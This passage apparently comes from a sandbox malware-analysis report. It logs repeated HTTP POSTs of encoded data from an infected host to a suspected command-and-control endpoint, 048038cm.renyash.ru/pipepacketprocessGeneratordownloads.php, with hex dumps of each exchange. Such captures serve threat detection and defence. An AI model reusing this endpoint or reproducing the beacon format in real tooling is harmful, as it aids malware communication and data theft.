                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 28 27 31 01 34 05 30 52 24 2c 3a 16 2a 5b 3e 01 29 09 23 09 2b 38 33 51 31 16 02 59 3f 2b 3e 44 33 3c 32 13 36 3e 2f 0b 2a 2a 21 46 04 1e 22 01 20 2e 09 02 2a 0a 2a 0d 29 3c 30 17 22 20 31 58 24 04 39 51 25 01 33 55 36 5a 2c 0f 27 2f 23 51 2f 37 3e 5f 39 09 2e 0f 31 2e 2c 5e 0e 12 3a 08 25 09 26 01 3c 28 2a 02 26 23 34 08 25 15 39 5b 30 05 23 51 34 28 21 15 3f 56 3f 57 33 01 0e 52 2c 3b 0d 5d 26 29 06 1d 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 ('140R$,:*[>)#+83Q1Y?+>D3<26>/**!F" .**)<0" 1X$9Q%3U6Z,'/#Q/7>_9.1.,^:%&<(*&#4%9[0#Q4(!?V?W3R,;]&)>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:33.503240108 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 1888
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:33.883322954 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:33.883492947 CET1888OUTData Raw: 56 52 59 51 56 40 55 5e 5d 5f 52 56 5a 5b 58 5d 57 51 5f 5b 54 55 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VRYQV@U^]_RVZ[X]WQ_[TUUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX')?!!+#8,+/Z!>)-##W*'-$!0<*<%\ ![(+
                                                                        Dec 28, 2024 20:42:34.407548904 CET957INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:34 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcn8QlmH0ZhaIeRO%2Bby%2BnXBLlqIrurw9Wl3assyv6h3Fm3KZWx27EYb8p8HcyEjK9JbXmAYclephUiy03%2FRUTeaj8F19zIFHM9mG8CXuV%2BDSyJPNjbbvbdA8Qbobz1A0N5tMcQbk"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408c4a87e42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9586&min_rtt=1714&rtt_var=14109&sent=13&recv=15&lost=0&retrans=0&sent_bytes=3201&recv_bytes=3556&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 2b 0a 04 12 20 5d 30 54 27 3f 32 58 29 3e 22 02 3e 0e 34 1d 2a 06 16 0f 26 06 0d 01 3c 01 2e 41 27 01 2e 1d 21 2d 09 0d 28 2a 21 46 04 1e 21 5d 23 58 28 58 29 33 29 52 29 3c 24 16 35 30 29 5c 24 04 3d 51 27 2b 30 0c 21 2f 30 0e 33 5a 30 0e 3b 27 2a 5f 2d 0e 0c 0b 31 04 2c 5e 0e 12 39 50 25 0e 3d 5b 28 38 14 03 24 33 38 08 26 2b 26 02 33 28 3b 1d 23 06 0b 58 28 33 20 0d 24 59 20 56 2e 3b 09 5e 30 17 23 08 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a
                                                                        Data Ascii: 98#+ ]0T'?2X)>">4*&<.A'.!-(*!F!]#X(X)3)R)<$50)\$=Q'+0!/03Z0;'*_-1,^9P%=[(8$38&+&3(;#X(3 $Y V.;^0#*!^/,Q4TV
                                                                        Dec 28, 2024 20:42:34.617825031 CET5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
                                                                        Dec 28, 2024 20:42:34.620933056 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:34.953150988 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:34.953360081 CET2100OUTData Raw: 53 51 59 55 53 44 50 5e 5d 5f 52 56 5a 50 58 58 57 5c 5f 5d 54 50 55 47 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SQYUSDP^]_RVZPXXW\_]TPUGR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$+,Z!;+ %(^/]+ >:]) 7)<=/$-:;Y" *%\ ![(
                                                                        Dec 28, 2024 20:42:35.485136032 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBMhI13Aq5EOoW860J2hfeNg%2F%2FYbhTCtBxSlVxjdiM6Y5pK3859Ei6D6C1RWk1FunqjP6VUMVWn4Ha3%2BrHpDMBYAsR56XLNJc%2FgP58zkO61Cp14eTc3ECguhPb%2BBNzg8KBNHZFrc"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408cb78ea42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9555&min_rtt=1714&rtt_var=11217&sent=19&recv=20&lost=0&retrans=0&sent_bytes=4188&recv_bytes=5962&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 10 3c 27 3a 10 20 28 37 0d 24 5a 31 01 2b 2d 08 04 3e 30 20 1c 3d 3b 20 0d 26 16 2c 5f 3f 01 29 1b 27 2f 35 08 22 2e 38 55 28 00 21 46 04 1e 22 01 23 2e 24 10 3d 20 29 56 3d 05 3b 05 21 33 26 06 33 39 25 52 25 2b 2f 55 21 3c 23 50 27 2c 27 56 2c 34 3e 19 2d 20 3d 52 25 14 2c 5e 0e 12 39 15 24 33 3d 58 3c 38 1b 10 30 33 20 0d 26 5d 3e 02 27 2b 2f 54 37 16 3a 05 2b 0e 2b 1e 27 3f 2b 0c 3a 3b 20 05 33 2a 2c 57 3d 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#<': (7$Z1+->0 =; &,_?)'/5".8U(!F"#.$= )V=;!3&39%R%+/U!<#P','V,4>- =R%,^9$3=X<803 &]>'+/T7:++'?+:; 3*,W=!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:35.488133907 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:35.821675062 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:35.821952105 CET2100OUTData Raw: 56 5b 59 51 53 42 55 5c 5d 5f 52 56 5a 51 58 59 57 5f 5f 5d 54 55 55 42 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YQSBU\]_RVZQXYW__]TUUBR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y</=!+,_ #/+77.)P#)<$-+["#'Z(,%\ ![(
                                                                        Dec 28, 2024 20:42:36.352484941 CET963INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:36 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbyZx%2BVkvR6f%2BzWULjCamC39HmPgrzYCdlJo5Wg3vY6Rk%2BH6nlsNRGkixCAWJCtRavr7WLxXQgSgTVUHZJYn2%2FwFVQirnSKnD2igNBfQJL4qyUi8QCoLMV6La8Y6K1nZYF6bDpnA"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d0ef2c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10383&min_rtt=1714&rtt_var=11150&sent=25&recv=25&lost=0&retrans=0&sent_bytes=5177&recv_bytes=8368&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0f 3c 27 2a 5b 37 05 28 57 33 2c 22 58 2b 3e 3d 5a 2a 33 3f 45 3e 28 23 51 26 38 33 07 3e 2b 2e 43 27 3f 36 55 22 03 06 54 3c 00 21 46 04 1e 21 1e 20 00 23 02 3e 0a 3d 1c 2a 12 2b 05 36 09 3d 5e 26 3a 00 0e 26 01 24 0d 21 05 3f 57 24 05 27 1a 3b 0a 3d 06 3a 09 25 54 32 04 2c 5e 0e 12 3a 0f 25 20 25 10 29 2b 39 12 24 56 37 51 25 2b 00 05 27 2b 33 1e 37 01 25 16 29 23 3b 55 24 11 34 55 2e 02 2b 16 30 39 06 1c 2a 08 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 <'*[7(W3,"X+>=Z*3?E>(#Q&83>+.C'?6U"T<!F! #>=*+6=^&:&$!?W$';=:%T2,^:% %)+9$V7Q%+'+37%)#;U$4U.+09*!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:36.358977079 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:36.692096949 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:36.692250013 CET2100OUTData Raw: 56 55 59 50 56 41 50 5f 5d 5f 52 56 5a 5d 58 5a 57 5f 5f 51 54 51 55 41 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYPVAP_]_RVZ]XZW__QTQUAR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'<>!88 5-+(4.>) +T(?0-_7"V#]=,%\ ![(3
                                                                        Dec 28, 2024 20:42:37.219238043 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fa1kgRuJdQCTqpH5uzAstwsChp%2FWtzgPXC0SlQPK%2BUfIwJ6bH2ISlVsFHOLiBss8lA0EvzQjlZEb8%2FZx6YPTrFVV6F4uELfMn3HPuxF7mz%2BJyxhDi5cWxU9crSEII%2FD5iZ9OuUON"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408d65d6342cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=9608&min_rtt=1714&rtt_var=8453&sent=31&recv=30&lost=0&retrans=0&sent_bytes=6165&recv_bytes=10774&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1e 2b 1a 22 59 21 2b 24 1e 27 12 3a 5e 2a 3e 3d 10 3d 30 28 1a 2a 06 15 50 26 16 01 00 2b 28 00 42 27 2c 2d 0e 35 04 28 52 2b 3a 21 46 04 1e 22 00 34 00 24 58 29 33 31 1c 3e 2c 24 5b 21 20 31 15 30 03 39 1a 26 01 3b 1e 36 05 33 50 27 02 09 53 2d 27 29 06 2d 56 3d 1e 31 04 2c 5e 0e 12 3a 0a 25 20 29 10 28 38 1b 12 33 33 23 55 32 05 25 58 26 28 3b 1d 20 2b 3d 1b 29 33 23 10 33 2f 38 55 39 38 38 01 24 29 0e 55 2a 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#+"Y!+$':^*>==0(*P&+(B',-5(R+:!F"4$X)31>,$[! 109&;63P'S-')-V=1,^:% )(833#U2%X&(; +=)3#3/8U988$)U*!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:37.226074934 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:37.579164982 CET2100OUTData Raw: 56 57 5c 54 56 47 50 59 5d 5f 52 56 5a 5d 58 5e 57 58 5f 50 54 55 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VW\TVGPY]_RVZ]X^WX_PTUUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_+!Z5,X45 ^,44=-==###P)8,*(# $=,%\ ![(3
                                                                        Dec 28, 2024 20:42:37.715698004 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:37.930838108 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:38.135669947 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C3gVxZ3sGdTq0%2BfBWdpPO%2FcHiXBgTLmD81qq%2Ft8qt0Bi%2BORqwpeM1dd2qrs1bN1hRAAAVsmck%2BxUGu9DYpc8H4oKmsZdJv6xP08H0u%2Fu%2FjGXw1adxqgOjDQHVA7OGFuuzckgibRU"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408dbbbbe42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10111&min_rtt=1714&rtt_var=9181&sent=37&recv=35&lost=0&retrans=0&sent_bytes=7154&recv_bytes=13180&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1f 2a 24 22 59 34 38 2b 0b 33 2c 0c 15 29 3e 21 1e 2a 20 24 1a 3d 5e 3b 50 27 3b 2c 59 3c 38 25 1d 27 11 32 50 22 13 30 52 3f 00 21 46 04 1e 21 5a 23 07 3c 5f 2a 0d 22 0c 2a 5a 20 14 21 0e 14 05 24 2a 3a 0f 32 3b 33 1d 22 2c 2b 13 24 2c 2f 50 2f 1a 2a 5d 2d 23 39 56 25 2e 2c 5e 0e 12 3a 09 31 30 13 10 3c 06 1b 59 33 30 16 0e 26 15 25 5c 33 02 3b 54 34 38 26 04 28 1e 3f 10 24 59 3b 0e 2e 3b 06 01 27 39 3c 50 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a
                                                                        Data Ascii: 98#*$"Y48+3,)>!* $=^;P';,Y<8%'2P"0R?!F!Z#<_*"*Z !$*:2;3",+$,/P/*]-#9V%.,^:10<Y30&%\3;T48&(?$Y;.;'9<P>"!^/,Q4TV
                                                                        Dec 28, 2024 20:42:38.345896006 CET5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0
                                                                        Dec 28, 2024 20:42:38.347070932 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:38.679655075 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:39.204943895 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IVsP2hDmLlujLDolIArUABQAwGqW1UezPdY0vWN93nb%2FnTELU72R374XzhZN%2BMpXH%2FWezf8Jt59ZEz8JWzHOAH3w%2BNO53RpqmxF2bPEsbGEGlTyJapc567mpgE0N065rXc7c9P0Y"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e2bc2b42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=10986&min_rtt=1714&rtt_var=10524&sent=43&recv=40&lost=0&retrans=0&sent_bytes=8148&recv_bytes=15586&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 20 0e 28 0a 00 58 23 38 33 0f 24 02 39 06 3d 03 25 5b 2a 09 2c 1b 2a 28 3b 56 31 01 2c 5a 3c 28 35 19 33 3c 39 0f 22 2e 2b 0a 3f 00 21 46 04 1e 21 13 37 3d 30 59 29 33 2e 0b 2b 3c 20 17 22 30 21 1a 24 14 31 52 25 01 2f 55 22 5a 27 50 24 05 3b 1b 38 34 26 5d 3a 0e 32 0e 25 3e 2c 5e 0e 12 3a 0b 25 1e 35 11 3c 01 26 00 27 1e 20 0c 32 3b 31 5d 24 05 0d 51 23 5e 22 00 3f 09 37 55 24 2f 27 0b 2d 38 20 00 27 5f 3f 08 29 32 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98 (X#83$9=%[*,*(;V1,Z<(53<9".+?!F!7=0Y)3.+< "0!$1R%/U"Z'P$;84&]:2%>,^:%5<&' 2;1]$Q#^"?7U$/'-8 '_?)2!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:39.205889940 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2076
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:39.538486004 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:40.063571930 CET964INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmS0O52uV3DELwBUJMgx%2FuU08ozCcRqEArg6VJFslxfzyQYYzvRamD8%2F9V%2FtooYYw8e8ZVtFpam0xGhwQAi7b9EbR098KiA21zdLKBwBZaWFrkYvLiuWhY4crPjBUfTzoC%2BDEB3S"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408e81a8842cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11714&min_rtt=1714&rtt_var=11381&sent=49&recv=45&lost=0&retrans=0&sent_bytes=9137&recv_bytes=17968&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 56 2b 1a 25 01 37 5d 2f 0f 26 3c 22 1b 3e 04 2a 04 3e 1e 0e 18 3e 28 11 55 25 01 24 5e 28 5e 2e 07 27 01 00 51 35 3d 33 0e 3f 2a 21 46 04 1e 22 04 34 3e 24 5e 3e 0d 2e 0b 3d 02 3c 5c 21 1e 29 15 24 04 26 0a 26 16 30 0b 20 3f 3f 1c 24 2c 2b 57 2f 1a 22 16 39 33 26 0a 26 04 2c 5e 0e 12 39 50 25 20 31 5c 2b 16 32 03 33 20 3f 1f 31 15 0f 59 24 2b 38 08 21 28 21 16 2b 23 34 0d 27 3c 34 1f 2d 15 02 07 27 39 06 54 3e 22 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#V+%7]/&<">*>>(U%$^(^.'Q5=3?*!F"4>$^>.=<\!)$&&0 ??$,+W/"93&&,^9P% 1\+23 ?1Y$+8!(!+#4'<4-'9T>"!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:40.070907116 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:40.403213978 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:40.938472986 CET969INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:40 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qbfp%2FcBZUe08w3XiHqyzpey5ogG4F9AW21ctM2bFdo%2Byu7Zepd0Sh2NLFG1WHvgW3gsVkV3%2FX2I6OBMi%2FW87AQDvr%2B%2FgfIHqJVZQZ0IObQ4UzzfgZ459Od4MKGjkTBmQl3XFiItf"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408ed894c42cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=11578&min_rtt=1714&rtt_var=10464&sent=55&recv=50&lost=0&retrans=0&sent_bytes=10126&recv_bytes=20374&delivery_rate=2445561&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 39 38 0d 0a 00 1a 23 1d 2b 34 2e 58 23 05 24 1c 24 12 2d 01 29 04 29 5c 28 30 0e 18 2b 38 3f 12 26 3b 3b 07 3f 38 03 19 27 3c 26 51 35 3e 30 11 3c 10 21 46 04 1e 22 04 23 10 06 13 2a 23 3e 0f 29 2c 02 5f 35 0e 29 58 26 29 31 51 31 16 20 0e 20 2f 30 0d 25 2f 3b 52 2f 1d 21 06 2e 20 2d 1e 25 14 2c 5e 0e 12 39 1b 26 30 2a 02 2b 3b 25 59 33 09 2b 12 27 3b 31 1f 33 2b 3b 51 23 3b 22 01 28 33 20 0e 27 01 3b 0d 39 3b 3f 5c 24 17 30 1e 3d 18 21 5e 2f 0d 2c 51 00 34 54 56 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 98#+4.X#$$-))\(0+8?&;;?8'<&Q5>0<!F"#*#>),_5)X&)1Q1 /0%/;R/!. -%,^9&0*+;%Y3+';13+;Q#;"(3 ';9;?\$0=!^/,Q4TV0
                                                                        Dec 28, 2024 20:42:40.950210094 CET306OUTPOST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2100
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:42:41.282687902 CET25INHTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:42:41.812064886 CET966INHTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:42:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PvHSGmPDbA%2FO%2FCDG66bMeWMY5ZAn0iX0%2BxkV7mKIp25qNo8PnodXDTebxUp5%2B6rCIjsOkocuASMo7X4OBqEp0eZ8fQPgsPD%2BNQnXiK58WSVwKtuK7j5vMMoNTTSLX1rI8yB6Wrhg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f9408f3080642cc-EWR
                                                                        alt-svc: h3=":443"; ma=86400
